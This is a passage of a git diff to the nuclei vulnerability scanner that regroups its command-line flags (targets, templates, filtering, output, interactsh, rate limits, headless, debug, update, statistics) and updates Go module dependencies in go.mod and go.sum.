set.BoolVarP(&options.NoMeta, "no-meta", "nm", false, "Don't display metadata for the matches") - set.BoolVarP(&options.TemplatesVersion, "templates-version", "tv", false, "Shows the installed nuclei-templates version") - set.BoolVar(&options.OfflineHTTP, "passive", false, "Enable Passive HTTP response processing mode") - set.StringVarP(&options.BurpCollaboratorBiid, "burp-collaborator-biid", "biid", "", "Burp Collaborator BIID") - set.StringVarP(&options.ReportingConfig, "report-config", "rc", "", "Nuclei Reporting Module configuration file") - set.StringVarP(&options.ReportingDB, "report-db", "rdb", "", "Local Nuclei Reporting Database (Always use this to persistent report data)") - set.StringSliceVar(&options.Tags, "tags", []string{}, "Tags to execute templates for") - set.StringSliceVarP(&options.ExcludeTags, "exclude-tags", "etags", []string{}, "Exclude templates with the provided tags") - set.StringVarP(&options.ResolversFile, "resolvers", "r", "", "File containing resolver list for nuclei") - set.BoolVar(&options.Headless, "headless", false, "Enable headless browser based templates support") - set.BoolVar(&options.ShowBrowser, "show-browser", false, "Show the browser on the screen") - set.IntVarP(&options.StatsInterval, "stats-interval", "si", 5, "Number of seconds between each stats line") - set.BoolVar(&options.SystemResolvers, "system-resolvers", false, "Use system dns resolving as error fallback") - set.IntVar(&options.PageTimeout, "page-timeout", 20, "Seconds to wait for each page in headless") - set.BoolVarP(&options.NewTemplates, "new-templates", "nt", false, "Only run newly added templates") - set.StringVarP(&options.DiskExportDirectory, "disk-export", "de", "", "Directory on disk to export reports in markdown to") - set.BoolVar(&options.NoInteractsh, "no-interactsh", false, "Do not use interactsh server for blind interaction polling") - set.StringVar(&options.InteractshURL, "interactsh-url", "https://interact.sh", "Interactsh Server URL") - set.IntVar(&options.InteractionsCacheSize, "interactions-cache-size", 5000, "Number of requests to keep in interactions cache") - set.IntVar(&options.InteractionsEviction, "interactions-eviction", 60, "Number of seconds to wait before evicting requests from cache") - set.IntVar(&options.InteractionsPollDuration, "interactions-poll-duration", 5, "Number of seconds before each interaction poll request") - set.IntVar(&options.InteractionsColldownPeriod, "interactions-cooldown-period", 5, "Extra time for interaction polling before exiting") - _ = set.Parse() + flagSet := goflags.NewFlagSet() + flagSet.SetDescription(`Nuclei is a fast, template based vulnerability scanner focusing +on extensive configurability, massive extensibility and ease of use.`) + + createGroup(flagSet, "input", "Target", + flagSet.StringSliceVarP(&options.Targets, "target", "u", []string{}, "target URLs/hosts to scan"), + flagSet.StringVarP(&options.TargetsFilePath, "list", "l", "", "path to file containing a list of target URLs/hosts to scan (one per line)"), + ) + + createGroup(flagSet, "templates", "Templates", + flagSet.BoolVar(&options.TemplateList, "tl", false, "list all available templates"), + + flagSet.StringSliceVarP(&options.Templates, "templates", "t", []string{}, "template or template directory paths to include in the scan"), + flagSet.StringSliceVarP(&options.Workflows, "workflows", "w", []string{}, "list of workflows to run"), + + flagSet.BoolVarP(&options.NewTemplates, "new-templates", "nt", false, "run newly added templates only"), + flagSet.BoolVar(&options.Validate, "validate", false, "validate the passed templates to nuclei"), + ) + + createGroup(flagSet, "filters", "Filtering", + flagSet.NormalizedStringSliceVar(&options.Tags, "tags", []string{}, "execute a subset of templates that contain the provided tags"), + flagSet.NormalizedStringSliceVar(&options.IncludeTags, "include-tags", []string{}, "tags from the default deny list that permit executing more intrusive templates"), // TODO show default deny list + flagSet.NormalizedStringSliceVarP(&options.ExcludeTags, "exclude-tags", "etags", []string{}, "exclude templates with the provided tags"), + + flagSet.StringSliceVar(&options.IncludeTemplates, "include-templates", []string{}, "templates to be executed even if they are excluded either by default or configuration"), + flagSet.StringSliceVarP(&options.ExcludedTemplates, "exclude", "exclude-templates", []string{}, "template or template directory paths to exclude"), + + flagSet.NormalizedStringSliceVarP(&options.Severity, "impact", "severity", []string{}, "execute templates that match the provided severities only"), + flagSet.NormalizedStringSliceVar(&options.Author, "author", []string{}, "execute templates that are (co-)created by the specified authors"), + ) + + createGroup(flagSet, "output", "Output", + flagSet.StringVarP(&options.Output, "output", "o", "", "output file to write found issues/vulnerabilities"), + + flagSet.BoolVar(&options.Silent, "silent", false, "display findings only"), + flagSet.BoolVarP(&options.Verbose, "verbose", "v", false, "show verbose output"), + flagSet.BoolVar(&options.VerboseVerbose, "vv", false, "display extra verbose information"), + flagSet.BoolVarP(&options.NoColor, "no-color", "nc", false, "disable output content coloring (ANSI escape codes)"), + + flagSet.BoolVar(&options.JSON, "json", false, "write output in JSONL(ines) format"), + flagSet.BoolVarP(&options.JSONRequests, "include-rr", "irr", false, "include request/response pairs in the JSONL output (for findings only)"), + + flagSet.BoolVarP(&options.NoMeta, "no-meta", "nm", false, "don't display match metadata"), + flagSet.StringVarP(&options.ReportingDB, "report-db", "rdb", "", "local nuclei reporting database (always use this to persist report data)"), + + flagSet.StringVarP(&options.DiskExportDirectory, "markdown-export", "me", "", "directory to export results in markdown format"), + flagSet.StringVarP(&options.SarifExport, "sarif-export", "se", "", "file to export results in SARIF format"), + ) + + createGroup(flagSet, "configs", "Configurations", + flagSet.StringVar(&cfgFile, "config", "", "path to the nuclei configuration file"), + flagSet.StringVarP(&options.ReportingConfig, "report-config", "rc", "", "nuclei reporting module configuration file"), // TODO merge into the config file or rename to issue-tracking + + flagSet.StringSliceVarP(&options.CustomHeaders, "header", "H", []string{}, "custom headers in header:value format"), + + flagSet.StringVarP(&options.ResolversFile, "resolvers", "r", "", "file containing resolver list for nuclei"), + flagSet.BoolVar(&options.SystemResolvers, "system-resolvers", false, "use system DNS resolving as error fallback"), + flagSet.BoolVar(&options.OfflineHTTP, "passive", false, "enable passive HTTP response processing mode"), + ) + + createGroup(flagSet, "interactsh", "interactsh", + flagSet.BoolVar(&options.NoInteractsh, "no-interactsh", false, "do not use interactsh server for blind interaction polling"), + flagSet.StringVar(&options.InteractshURL, "interactsh-url", "https://interact.sh", "self-hosted Interactsh Server URL"), + + flagSet.IntVar(&options.InteractionsCacheSize, "interactions-cache-size", 5000, "number of requests to keep in the interactions cache"), + flagSet.IntVar(&options.InteractionsEviction, "interactions-eviction", 60, "number of seconds to wait before evicting requests from cache"), + flagSet.IntVar(&options.InteractionsPollDuration, "interactions-poll-duration", 5, "number of seconds to wait before each interaction poll request"), + flagSet.IntVar(&options.InteractionsColldownPeriod, "interactions-cooldown-period", 5, "extra time for interaction polling before exiting"), + ) + + createGroup(flagSet, "rate-limit", "Rate-Limit", + flagSet.IntVarP(&options.RateLimit, "rate-limit", "rl", 150, "maximum number of requests to send per second"), + flagSet.IntVarP(&options.RateLimitMinute, "rate-limit-minute", "rlm", 0, "maximum number of requests to send per minute"), + flagSet.IntVarP(&options.BulkSize, "bulk-size", "bs", 25, "maximum number of hosts to be analyzed in parallel per template"), + flagSet.IntVarP(&options.TemplateThreads, "concurrency", "c", 10, "maximum number of templates to be executed in parallel"), + ) + + createGroup(flagSet, "optimization", "Optimizations", + flagSet.IntVar(&options.Timeout, "timeout", 5, "time to wait in seconds before timeout"), + flagSet.IntVar(&options.Retries, "retries", 1, "number of times to retry a failed request"), + + flagSet.BoolVar(&options.Project, "project", false, "use a project folder to avoid sending same request multiple times"), + flagSet.StringVar(&options.ProjectPath, "project-path", os.TempDir(), "set a specific project path"), + + flagSet.BoolVarP(&options.StopAtFirstMatch, "stop-at-first-path", "spm", false, "stop processing HTTP requests after the first match (may break template/workflow logic)"), + ) + + createGroup(flagSet, "headless", "Headless", + flagSet.BoolVar(&options.Headless, "headless", false, "enable templates that require headless browser support"), + flagSet.IntVar(&options.PageTimeout, "page-timeout", 20, "seconds to wait for each page in headless mode"), + flagSet.BoolVar(&options.ShowBrowser, "show-browser", false, "show the browser on the screen when running templates with headless mode"), + ) + + createGroup(flagSet, "debug", "Debug", + flagSet.BoolVar(&options.Debug, "debug", false, "show all requests and responses"), + flagSet.BoolVar(&options.DebugRequests, "debug-req", false, "show all sent requests"), + flagSet.BoolVar(&options.DebugResponse, "debug-resp", false, "show all received responses"), + + /* TODO why the separation? http://proxy:port vs socks5://proxy:port etc + TODO should auto-set the HTTP_PROXY variable for the process? */ + flagSet.StringVarP(&options.ProxyURL, "proxy-url", "proxy", "", "URL of the HTTP proxy server"), + flagSet.StringVar(&options.ProxySocksURL, "proxy-socks-url", "", "URL of the SOCKS proxy server"), + + flagSet.StringVar(&options.TraceLogFile, "trace-log", "", "file to write sent requests trace log"), + + flagSet.BoolVar(&options.Version, "version", false, "show nuclei version"), + flagSet.BoolVarP(&options.TemplatesVersion, "templates-version", "tv", false, "shows the version of the installed nuclei-templates"), + ) + + createGroup(flagSet, "update", "Update", + flagSet.BoolVar(&options.UpdateNuclei, "update", false, "update nuclei to the latest released version"), + flagSet.BoolVarP(&options.UpdateTemplates, "update-templates", "ut", false, "update the community templates to latest released version"), + flagSet.BoolVarP(&options.NoUpdateTemplates, "no-update-templates", "nut", false, "Do not check for nuclei-templates updates"), + flagSet.StringVarP(&options.TemplatesDirectory, "update-directory", "ud", templatesDirectory, "overwrite the default nuclei-templates directory"), + ) + + createGroup(flagSet, "stats", "Statistics", + flagSet.BoolVar(&options.EnableProgressBar, "stats", false, "display statistics about the running scan"), + flagSet.BoolVar(&options.StatsJSON, "stats-json", false, "write statistics data to an output file in JSONL(ines) format"), + flagSet.IntVarP(&options.StatsInterval, "stats-interval", "si", 5, "number of seconds to wait between showing a statistics update"), + + flagSet.BoolVar(&options.Metrics, "metrics", false, "expose nuclei metrics on a port"), + flagSet.IntVar(&options.MetricsPort, "metrics-port", 9092, "port to expose nuclei metrics on"), + ) + + flagSet.StringSliceVarP(&options.AdvancedWorkflows, "advanced-workflows", "wa", []string{}, "Advanced workflows to run for nuclei") + + _ = flagSet.Parse() if cfgFile != "" { - if err := set.MergeConfigFile(cfgFile); err != nil { + if err := flagSet.MergeConfigFile(cfgFile); err != nil { gologger.Fatal().Msgf("Could not read config: %s\n", err) } } } + +func createGroup(flagSet *goflags.FlagSet, groupName, description string, flags ...*goflags.FlagData) { + flagSet.SetGroup(groupName, description) + for _, currentFlag := range flags { + currentFlag.Group(groupName) + } +} diff --git a/v2/go.mod b/v2/go.mod index 0a7c4a2d7e..13d3132f22 100644 --- a/v2/go.mod +++ b/v2/go.mod @@ -3,18 +3,23 @@ module github.com/projectdiscovery/nuclei/v2 go 1.15 require ( + github.com/Knetic/govaluate v3.0.0+incompatible github.com/andygrunwald/go-jira v1.13.0 + github.com/apex/log v1.9.0 github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d // indirect github.com/blang/semver v3.5.1+incompatible + github.com/c4milo/unpackit v0.1.0 // indirect github.com/corpix/uarand v0.1.1 github.com/fatih/structs v1.1.0 // indirect github.com/go-rod/rod v0.96.0 github.com/golang/protobuf v1.5.1 // indirect github.com/golang/snappy v0.0.3 // indirect github.com/google/go-github v17.0.0+incompatible - github.com/google/go-github/v32 v32.1.0 + github.com/gosuri/uilive v0.0.4 // indirect + github.com/gosuri/uiprogress v0.0.1 // indirect github.com/hashicorp/go-cleanhttp v0.5.2 // indirect github.com/hashicorp/go-retryablehttp v0.6.8 // indirect + github.com/itchyny/gojq v0.12.4 github.com/json-iterator/go v1.1.10 github.com/julienschmidt/httprouter v1.3.0 github.com/karlseguin/ccache v2.0.3+incompatible @@ -22,28 +27,31 @@ require ( github.com/logrusorgru/aurora v2.0.3+incompatible github.com/mattn/go-runewidth v0.0.10 // indirect github.com/miekg/dns v1.1.41 - github.com/mitchellh/go-ps v1.0.0 github.com/olekukonko/tablewriter v0.0.5 + github.com/owenrumney/go-sarif v1.0.4 github.com/pkg/errors v0.9.1 github.com/projectdiscovery/clistats v0.0.8 - github.com/projectdiscovery/collaborator v0.0.2 github.com/projectdiscovery/fastdialer v0.0.9 - github.com/projectdiscovery/goflags v0.0.4 + github.com/projectdiscovery/goflags v0.0.6 github.com/projectdiscovery/gologger v1.1.4 github.com/projectdiscovery/hmap v0.0.1 - github.com/projectdiscovery/interactsh v0.0.2 + github.com/projectdiscovery/interactsh v0.0.3 github.com/projectdiscovery/mapsutil v0.0.1 - github.com/projectdiscovery/rawhttp v0.0.6 + github.com/projectdiscovery/rawhttp v0.0.7 github.com/projectdiscovery/retryabledns v1.0.10 - github.com/projectdiscovery/retryablehttp-go v1.0.1 + github.com/projectdiscovery/retryablehttp-go v1.0.2-0.20210524224054-9fbe1f2b0727 github.com/projectdiscovery/starlight v0.0.0-20210322151037-9b9e2da4e8b7 + github.com/projectdiscovery/stringsutil v0.0.0-20210617141317-00728870f68d github.com/remeh/sizedwaitgroup v1.0.0 github.com/rivo/uniseg v0.2.0 // indirect github.com/rs/xid v1.2.1 github.com/segmentio/ksuid v1.0.3 + github.com/shirou/gopsutil/v3 v3.21.5 + github.com/spaolacci/murmur3 v1.1.0 github.com/spf13/cast v1.3.1 github.com/stretchr/testify v1.7.0 github.com/syndtr/goleveldb v1.0.0 + github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible github.com/trivago/tgo v1.0.7 // indirect github.com/valyala/fasttemplate v1.2.1 github.com/xanzy/go-gitlab v0.47.0 @@ -51,11 +59,8 @@ require ( go.uber.org/atomic v1.7.0 go.uber.org/multierr v1.6.0 go.uber.org/ratelimit v0.2.0 - golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 // indirect - golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4 + golang.org/x/net v0.0.0-20210521195947-fe42d452be8f golang.org/x/oauth2 v0.0.0-20210313182246-cd4f82c27b84 - golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4 // indirect - golang.org/x/text v0.3.4 // indirect golang.org/x/time v0.0.0-20210220033141-f8bda1e9f3ba // indirect google.golang.org/appengine v1.6.7 // indirect gopkg.in/yaml.v2 v2.4.0 diff --git a/v2/go.sum b/v2/go.sum index 7b3e7227f4..a2b248f089 100644 --- a/v2/go.sum +++ b/v2/go.sum @@ -33,18 +33,34 @@ cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9 dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= +github.com/Knetic/govaluate v3.0.0+incompatible h1:7o6+MAPhYTCF0+fdvoz1xDedhRb4f6s9Tn1Tt7/WTEg= +github.com/Knetic/govaluate v3.0.0+incompatible/go.mod h1:r7JcOSlj0wfOMncg0iLm8Leh48TZaKVeNIfJntJ2wa0= github.com/Masterminds/glide v0.13.2/go.mod h1:STyF5vcenH/rUqTEv+/hBXlSTo7KYwg2oc2f4tzPWic= github.com/Masterminds/semver v1.4.2/go.mod h1:MB6lktGJrhw8PrUyiEoblNEGEQ+RzHPF078ddwwvV3Y= github.com/Masterminds/vcs v1.13.0/go.mod h1:N09YCmOQr6RLxC6UNHzuVwAdodYbbnycGHSmwVJjcKA= +github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d h1:G0m3OIz70MZUWq3EgK3CesDbo8upS2Vm9/P3FtgI+Jk= +github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d/go.mod h1:3eOhrUMpNV+6aFIbp5/iudMxNCF27Vw2OZgy4xEx0Fg= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129 h1:MzBOUgng9orim59UnfUTLRjMpd09C5uEVQ6RPGeCaVI= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129/go.mod h1:rFgpPQZYZ8vdbc+48xibu8ALc3yeyd64IhHS+PU6Yyg= github.com/andygrunwald/go-jira v1.13.0 h1:vvIImGgX32bHfoiyUwkNo+/YrPnRczNarvhLOncP6dE= github.com/andygrunwald/go-jira v1.13.0/go.mod h1:jYi4kFDbRPZTJdJOVJO4mpMMIwdB+rcZwSO58DzPd2I= +github.com/apex/log v1.9.0 h1:FHtw/xuaM8AgmvDDTI9fiwoAL25Sq2cxojnZICUU8l0= +github.com/apex/log v1.9.0/go.mod h1:m82fZlWIuiWzWP04XCTXmnX0xRkYYbCdYn8jbJeLBEA= +github.com/apex/logs v1.0.0/go.mod h1:XzxuLZ5myVHDy9SAmYpamKKRNApGj54PfYLcFrXqDwo= +github.com/aphistic/golf v0.0.0-20180712155816-02c07f170c5a/go.mod h1:3NqKYiepwy8kCu4PNA+aP7WUV72eXWJeP9/r3/K9aLE= +github.com/aphistic/sweet v0.2.0/go.mod h1:fWDlIh/isSE9n6EPsRmC0det+whmX6dJid3stzu0Xys= +github.com/apparentlymart/go-textseg/v13 v13.0.0/go.mod h1:ZK2fH7c4NqDTLtiYLvIkEghdlcqw7yxLeM89kiTRPUo= github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d h1:Byv0BzEl3/e6D5CLfI0j/7hiIEtvGVFPCZ7Ei2oq8iQ= github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= +github.com/aws/aws-sdk-go v1.20.6/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo= +github.com/aybabtme/rgbterm v0.0.0-20170906152045-cc83f3b3ce59/go.mod h1:q/89r3U2H7sSsE2t6Kca0lfwTK8JdoNGS/yzM/4iH5I= github.com/blang/semver v3.5.1+incompatible h1:cQNTCjp13qL8KC3Nbxr/y2Bqb63oX6wdnnjpJbkM4JQ= github.com/blang/semver v3.5.1+incompatible/go.mod h1:kRBLl5iJ+tD4TcOOxsy/0fnwebNt5EWlYSAyrTnjyyk= +github.com/bradfitz/iter v0.0.0-20191230175014-e8f45d346db8 h1:GKTyiRCL6zVf5wWaqKnf+7Qs6GbEPfd4iMOitWzXJx8= +github.com/bradfitz/iter v0.0.0-20191230175014-e8f45d346db8/go.mod h1:spo1JLcs67NmW1aVLEgtA8Yy1elc+X8y5SRW1sFW4Og= +github.com/c4milo/unpackit v0.1.0 h1:91pWJ6B3svZ4LOE+p3rnyucRK5fZwBdF/yQ/pcZO31I= +github.com/c4milo/unpackit v0.1.0/go.mod h1:pvXCMYlSV8zwGFWMaT+PWYkAB/cvDjN2mv9r7ZRSxEo= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI= github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e/go.mod h1:nSuG5e5PlCu98SY8svDHJxuZscDgtXS6KTTbou5AhLI= @@ -64,12 +80,16 @@ github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumC github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ= github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi/U= github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= +github.com/dsnet/compress v0.0.1 h1:PlZu0n3Tuv04TzpfPbrnI0HW/YwodEXDS+oPKahKF0Q= +github.com/dsnet/compress v0.0.1/go.mod h1:Aw8dCMJ7RioblQeTqt88akK31OvO8Dhf5JflhBbQEHo= +github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= github.com/eggsampler/acme/v3 v3.2.1 h1:Lfsrg3M2zt00QRnizOFzdpSfsS9oDvPsGrodXS/w1KI= github.com/eggsampler/acme/v3 v3.2.1/go.mod h1:/qh0rKC/Dh7Jj+p4So7DbWmFNzC4dpcpK53r226Fhuo= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= +github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= github.com/fatih/structs v1.0.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M= github.com/fatih/structs v1.1.0 h1:Q7juDM0QtcnhCpeyLGQKyg4TOIghuNXrkL32pHAUMxo= github.com/fatih/structs v1.1.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M= @@ -78,6 +98,9 @@ github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMo github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= github.com/go-gl/glfw/v3.3/glfw v0.0.0-20191125211704-12ad95a8df72/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= github.com/go-gl/glfw/v3.3/glfw v0.0.0-20200222043503-6f7a984d4dc4/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= +github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V4qmtdjCk= +github.com/go-ole/go-ole v1.2.4 h1:nNBDSCOigTSiarFpYE9J/KtEA1IOW4CNeqT9TQDqCxI= +github.com/go-ole/go-ole v1.2.4/go.mod h1:XCwSNxSkXRo4vlyPy93sltvi/qJq0jqQhjqQNIwKuxM= github.com/go-redis/redis v6.15.5+incompatible/go.mod h1:NAIEuMOZ/fxfXJIrKDQDz8wamY7mA7PouImQ2Jvg6kA= github.com/go-rod/rod v0.96.0 h1:XCeDDxiRFuCvDgU7yHuKnZf0AE6Kh6a3LrRHMUAq2xE= github.com/go-rod/rod v0.96.0/go.mod h1:cIR84WFrMAwShOkmIJcuJZDyKLjQq3yiZSMEhawHktc= @@ -121,17 +144,15 @@ github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/ github.com/google/go-cmp v0.4.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-github v17.0.0+incompatible h1:N0LgJ1j65A7kfXrZnUDaYCs/Sf4rEjNlfyDHW9dolSY= github.com/google/go-github v17.0.0+incompatible/go.mod h1:zLgOLi98H3fifZn+44m+umXrS52loVEgC2AApnigrVQ= -github.com/google/go-github/v32 v32.1.0 h1:GWkQOdXqviCPx7Q7Fj+KyPoGm4SwHRh8rheoPhd27II= -github.com/google/go-github/v32 v32.1.0/go.mod h1:rIEpZD9CTDQwDK9GDrtMTycQNA4JU3qBsCizh3q2WCI= github.com/google/go-querystring v0.0.0-20170111101155-53e6ce116135/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/go-querystring v1.0.0 h1:Xkwi/a1rcvNg1PPYe5vI8GbeBY/jrVuDX5ASuANWTrk= github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= -github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo= github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs= github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= @@ -142,10 +163,15 @@ github.com/google/pprof v0.0.0-20200229191704-1ebb73c60ed3/go.mod h1:ZgVRPoUq/hf github.com/google/pprof v0.0.0-20200430221834-fc25d7d30c6d/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= github.com/google/pprof v0.0.0-20200708004538-1a94d8640e99/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs= github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= +github.com/gosuri/uilive v0.0.4 h1:hUEBpQDj8D8jXgtCdBu7sWsy5sbW/5GhuO8KBwJ2jyY= +github.com/gosuri/uilive v0.0.4/go.mod h1:V/epo5LjjlDE5RJUcqx8dbw+zc93y5Ya3yg8tfZ74VI= +github.com/gosuri/uiprogress v0.0.1 h1:0kpv/XY/qTmFWl/SkaJykZXrBBzwwadmW8fRb7RJSxw= +github.com/gosuri/uiprogress v0.0.1/go.mod h1:C1RTYn4Sc7iEyf6j8ft5dyoZ4212h8G1ol9QQluh5+0= github.com/hashicorp/go-cleanhttp v0.5.1/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80= github.com/hashicorp/go-cleanhttp v0.5.2 h1:035FKYIWjmULyFRBKPs8TBQoi0x6d9G4xc9neXJWAZQ= github.com/hashicorp/go-cleanhttp v0.5.2/go.mod h1:kO/YDlP8L1346E6Sodw+PrpBSV4/SoxCXGY6BqNFT48= @@ -156,13 +182,22 @@ github.com/hashicorp/go-retryablehttp v0.6.8 h1:92lWxgpa+fF3FozM4B3UZtHZMJX8T5XT github.com/hashicorp/go-retryablehttp v0.6.8/go.mod h1:vAew36LZh98gCBJNLH42IQ1ER/9wtLZZ8meHqQvEYWY= github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= +github.com/hooklift/assert v0.1.0 h1:UZzFxx5dSb9aBtvMHTtnPuvFnBvcEhHTPb9+0+jpEjs= +github.com/hooklift/assert v0.1.0/go.mod h1:pfexfvIHnKCdjh6CkkIZv5ic6dQ6aU2jhKghBlXuwwY= github.com/hpcloud/tail v1.0.0 h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI= github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU= github.com/huandu/xstrings v1.3.2 h1:L18LIDzqlW6xN2rEkpdV8+oL/IXWJ1APd+vsdYy4Wdw= github.com/huandu/xstrings v1.3.2/go.mod h1:y5/lhBue+AyNmUVz9RLU9xbLR0o4KIIExikq4ovT0aE= github.com/ianlancetaylor/demangle v0.0.0-20181102032728-5e5cf60278f6/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc= +github.com/itchyny/go-flags v1.5.0/go.mod h1:lenkYuCobuxLBAd/HGFE4LRoW8D3B6iXRQfWYJ+MNbA= +github.com/itchyny/gojq v0.12.4 h1:8zgOZWMejEWCLjbF/1mWY7hY7QEARm7dtuhC6Bp4R8o= +github.com/itchyny/gojq v0.12.4/go.mod 